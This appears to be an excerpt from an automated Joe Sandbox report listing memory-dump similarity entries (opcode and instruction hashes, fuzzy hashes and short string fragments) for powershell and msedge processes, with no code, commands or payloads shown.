                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                          • Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
                                                                          • Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                          • Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229053854.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d63a6831ca54e350521d28d1b5e90fef133a81396abf51b19db8add2ee7bf4a
                                                                          • Instruction ID: 3c42ce584d4430eb4bc6933b6be2a5feea8373b12f605405dc3be592e00c8f06
                                                                          • Opcode Fuzzy Hash: 6d63a6831ca54e350521d28d1b5e90fef133a81396abf51b19db8add2ee7bf4a
                                                                          • Instruction Fuzzy Hash: 49F0F63790CE8C4FDB82FF2C98690E87FA0FF66215B0401ABD408C7161E7224948CBC2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229053854.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                          • API String ID: 0-1415242001
                                                                          • Opcode ID: 18246f1ced960f47f9313cb608ebcfae065cc244fd25530f79d916c2824cd461
                                                                          • Instruction ID: 208ff562fc9593e1c1eac2d9eee7fc3ebff388127ed0e92e8ac16a561240a24b
                                                                          • Opcode Fuzzy Hash: 18246f1ced960f47f9313cb608ebcfae065cc244fd25530f79d916c2824cd461
                                                                          • Instruction Fuzzy Hash: 882107736155159AC201376DB8415EE7790EF543B874552F3E218CF113DF2CA48B8A94
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2367469782.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (B%I$(B%I$(B%I$(B%I$(B%I
                                                                          • API String ID: 0-1877043794
                                                                          • Opcode ID: c262d5d9cbf67b9c8829df628fa691b9c601e6e949b41ef1dd2b2f71f78be209
                                                                          • Instruction ID: f951ae029bb92a83474beee37de444be3ceebfd6a6215602cc3691ab7371d930
                                                                          • Opcode Fuzzy Hash: c262d5d9cbf67b9c8829df628fa691b9c601e6e949b41ef1dd2b2f71f78be209
                                                                          • Instruction Fuzzy Hash: 76D12332D0EACA9FEBA5EF2858165B5BBA0EF16354F0401BBD04DC7093EA1AEC45C351
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2367469782.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>%I
                                                                          • API String ID: 0-3722309147
                                                                          • Opcode ID: a3728132266d19581d9dbe447d7eab99e197eca33636a83789a7dfbd300b2ec9
                                                                          • Instruction ID: fbd1dc7485937276eee8ce914e686f8e417cc39f5d8f2af23772161bb9571ac5
                                                                          • Opcode Fuzzy Hash: a3728132266d19581d9dbe447d7eab99e197eca33636a83789a7dfbd300b2ec9
                                                                          • Instruction Fuzzy Hash: 73510A32E1DAC68FEBA9EE2C541267577E1EF55360F5801BAC00EC71A3EE29EC058351
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2367469782.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p>%I
                                                                          • API String ID: 0-2206047945
                                                                          • Opcode ID: c55d907097f82827ced879c194b98ea934c31a8b6e7c727de67b8f23ef3c19f2
                                                                          • Instruction ID: 378f8e4036bebdabdde52a036ec7aedd87238310c9ec662158028aa7fe29742c
                                                                          • Opcode Fuzzy Hash: c55d907097f82827ced879c194b98ea934c31a8b6e7c727de67b8f23ef3c19f2
                                                                          • Instruction Fuzzy Hash: 2E411932E0DAC58FEBB5EE2C64126B577E1EF45760B0800BAC049C71A3EA19EC108395
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2367469782.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>%I
                                                                          • API String ID: 0-3722309147
                                                                          • Opcode ID: ade794f53c19e17fe03b6aed38d4a7eb1dd39d9f7141b5aac7c00bd1e58e937e
                                                                          • Opcode Fuzzy Hash: 0a92792795957b6f21a67e92784380a063be6d1f5ba9d200d6c14ec3feba3618
                                                                          • Instruction Fuzzy Hash: F7319F21B2D9491FE698EB2C946A379A6C2EFD9755F0405BAE00EC32D3DE28AC458345
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2714526363.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848f10000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7468f6472e445ca26d7f14afdb605aace80bab3c959b131f183e0e73f7d9f82a
                                                                          • Instruction ID: 1b42a7e3adc96217d4bc86f0db908ecb0499edae6150e71dd5c7577c6c1b257c
                                                                          • Opcode Fuzzy Hash: 7468f6472e445ca26d7f14afdb605aace80bab3c959b131f183e0e73f7d9f82a
                                                                          • Instruction Fuzzy Hash: 9731BE21F2D9595FE784BB6C98593BDA7D2EB98795F04027AE40DC32C3EE2C5C058392
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2714526363.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848f10000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 97e18b214ddb3ee8e5e8e71ee5c8c01b6de1c0140198ad21f82409e325b4b781
                                                                          • Instruction ID: ba68bb31dd2078d633136616c942cdeb37b3e6d3bf9b95c0bc2c1cb154495c8b
                                                                          • Opcode Fuzzy Hash: 97e18b214ddb3ee8e5e8e71ee5c8c01b6de1c0140198ad21f82409e325b4b781
                                                                          • Instruction Fuzzy Hash: 2731AF34A29A1E9FEB44FB6894656EA7BB1FF98300F50043AD409D32C6CF7C68498764
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2714526363.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ff848f10000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (xH$>O_^$?O_^$pxH
                                                                          • API String ID: 0-3313541221
                                                                          • Opcode ID: c9b8ebdc8fa6f28a04a7ebb13f3f9c73afe7f370d41357eb71a87b6a27ff6e35
                                                                          • Instruction ID: 07af99619de6bd1f667b61fb154dfe1d3d8f5e109675f616bbe1d2af12a7f91f
                                                                          • Opcode Fuzzy Hash: c9b8ebdc8fa6f28a04a7ebb13f3f9c73afe7f370d41357eb71a87b6a27ff6e35
                                                                          • Instruction Fuzzy Hash: 0251A727B0E6A25FE311B72DB8511E93B60EFC1776B0805B7D684CE093DA1C5C4A82B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: M_L$X_H
                                                                          • API String ID: 0-282035412
                                                                          • Opcode ID: 9c1db1216396a9364b1990a4bb296363b7552b6ceb01113d455d9c02928205d7
                                                                          • Instruction ID: 25be442cc73fb140e2338b471c8df98a799c1c51505cbacac7e5e53982d41f32
                                                                          • Opcode Fuzzy Hash: 9c1db1216396a9364b1990a4bb296363b7552b6ceb01113d455d9c02928205d7
                                                                          • Instruction Fuzzy Hash: 9EF1A231E2DA095FE798FB3884696B976D2FF98754F4001BAE40EC32D6DF2CA8418745
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c03f0234412570b9559a626e00eea9e14866f3d53e663ef59d934f4d91c1b98c
                                                                          • Instruction ID: dff3e52e46d093daf7cd03aac9fb6ac80cebe6ac8f45faa202aa1bcb66abeb4e
                                                                          • Opcode Fuzzy Hash: c03f0234412570b9559a626e00eea9e14866f3d53e663ef59d934f4d91c1b98c
                                                                          • Instruction Fuzzy Hash: 9F418E32D1E68A9FD742F76898A21EA7BB0FF46254F0402B7D049DB1D3DF2C284A8754
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4d7295fef001b753b928b35e4a6f6c13a5163ee12decbc552d3234de5e0f1f82
                                                                          • Instruction ID: 593eab063a67611567e37f6bde7455e33418632fb813b119a32dc1f95a1e0f6f
                                                                          • Opcode Fuzzy Hash: 4d7295fef001b753b928b35e4a6f6c13a5163ee12decbc552d3234de5e0f1f82
                                                                          • Instruction Fuzzy Hash: DF513521A1EAC61FE396B73858261B57FE2EF86690B0901FBD489C72D7CD1C5C468352
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e8b9519705c048bdac921da95a58cb95fd6b6911fcc8f8ae81cd29e124d8a666
                                                                          • Instruction ID: ae54f86fbbe89cf12b07a5e5ffc312e821001d42e75a1e10385c5a82fa828f6e
                                                                          • Opcode Fuzzy Hash: e8b9519705c048bdac921da95a58cb95fd6b6911fcc8f8ae81cd29e124d8a666
                                                                          • Instruction Fuzzy Hash: 60511320A1EAC95FD786AB385864276BFD1EF9B255F0801FBE08DC71D3CE085886C346
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 951655b5e090a2c4be928a33227efe05d2a8e844533b4e61d920a657b3ed6a42
                                                                          • Instruction ID: 8d5d3a7022d4a2d48e1397b1365d17422e8e5b1d49b64357af4f7cf0ed3ee97a
                                                                          • Opcode Fuzzy Hash: 951655b5e090a2c4be928a33227efe05d2a8e844533b4e61d920a657b3ed6a42
                                                                          • Instruction Fuzzy Hash: FD513F30E299199FE784F77880697B966E2FF98354F9004B9E40EC73C6DE2D9C418754
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e52a61b69b8ff242d0f3d322e10fdb94e2eeba7ee571533ebdc8baec57a1931a
                                                                          • Instruction ID: 78c2c4a1db8147c1eeedf22f2b65e62aa795774e0f6bc3898a9117c412bb270c
                                                                          • Opcode Fuzzy Hash: e52a61b69b8ff242d0f3d322e10fdb94e2eeba7ee571533ebdc8baec57a1931a
                                                                          • Instruction Fuzzy Hash: 18319321B2D9495FE698FB2C9459379B6C2EF99755F0406BAE00EC32D3DE28AC418345
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 21d6ee1e09752e937472e105beaf2e172c31308fd09851e22dc2425f5190e4ea
                                                                          • Instruction ID: 0e715d52d96820f89c13d0847433fec0535e1ba7f73b8edcbfbfd31bf2a29c75
                                                                          • Opcode Fuzzy Hash: 21d6ee1e09752e937472e105beaf2e172c31308fd09851e22dc2425f5190e4ea
                                                                          • Instruction Fuzzy Hash: 3C31AE21E2E9499FEB84BB6C58593BDB7D2EB98655F04027BE40DC32D3DE1C58018392
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bcfd0b046cda8527a8249e4c7f1f80ac976b1b3cd13bee4b5e6a46db841ffe41
                                                                          • Instruction ID: 9b3f31f2c41d2ae4933a0e5313d73654f12c103d3161cb02ee505863bd5052b3
                                                                          • Opcode Fuzzy Hash: bcfd0b046cda8527a8249e4c7f1f80ac976b1b3cd13bee4b5e6a46db841ffe41
                                                                          • Instruction Fuzzy Hash: 6B31A030E1AA0E9FEB44FB6884556EA7BF1FF98300F5005BAD009D3286CE3DA801C754
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2795079853.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ff848f30000_msedge.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (xH$>M_^$?M_^$pxH
                                                                          • API String ID: 0-1777582537
                                                                          • Opcode ID: 88c9044c975639fce2df28009f901e739446c604066144518d0b3ebbc72503b5
                                                                          • Instruction ID: 81fdafc9aebf433dfb86a57b2480f33a0680f6de4dcf1742a1dd84ce6ed0bc62
                                                                          • Opcode Fuzzy Hash: 88c9044c975639fce2df28009f901e739446c604066144518d0b3ebbc72503b5
                                                                          • Instruction Fuzzy Hash: 86519723B0F69A9FE351B72CB8511F97B60EF82676B0803F7D184CA0D3DA1D544A83A5